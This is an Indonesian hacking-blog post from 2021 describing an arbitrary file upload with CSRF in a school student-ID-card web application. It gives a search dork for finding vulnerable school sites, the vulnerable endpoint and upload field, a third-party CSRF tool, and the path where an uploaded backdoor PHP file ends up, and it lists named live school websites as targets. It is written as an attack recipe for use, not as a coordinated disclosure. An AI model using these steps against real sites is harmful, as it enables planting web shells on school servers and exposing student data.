Aplikasi Kartu Pelajar Vulnerability Arbitrary File Upload with CSRF

Januari 13, 2021

Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school)

[+]Author : ./meicookies
[+]Dork : intext:Responsive image aplikasi kartu pelajar site:sch.id

[+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php

if there is an alert "Data Berhasil di Ubah" the fucking website is vulnerable to arbitrary file upload

[+] CSRF :

https://tools.xploitsecid.or.id/Exploit/CSRF
postfile : gambar

[!] File Location :

The files you upload will go to
kartu.localcrot.sch.id/img/your_backdoor.php

[!] Live target : http://kartu.mit-alishlah.sch.id/user/aksi/ubah_pelajar.php
[!] My Target :
https://madarismiftahulhuda.com/kartu/

Blog - Hacker Patah Hati

Aplikasi Kartu Pelajar Vulnerability Arbitrary File Upload with CSRF

Posting Komentar